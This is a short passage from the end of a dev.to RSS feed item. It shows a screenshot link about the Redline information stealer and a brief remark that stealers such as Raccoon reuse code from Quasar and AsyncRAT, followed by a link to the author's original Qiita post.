&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4qvqv8zbd6zce3dp5nwp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4qvqv8zbd6zce3dp5nwp.png" alt="screenshot of any run Redline page" width="800" height="127"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Stealers also recycle code from other malware! For example Quasar and AsyncRAT (in RACOON's case).&lt;/p&gt;

&lt;p&gt;I will write about this soon!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://qiita.com/terceranexus6/items/b195157b76748cf50d12" rel="noopener noreferrer"&gt;Original post&lt;/a&gt; &lt;/p&gt;

</description>
      <category>linux</category>
      <category>japanese</category>
      <category>cyberthreats</category>
    </item>
  </channel>
</rss>
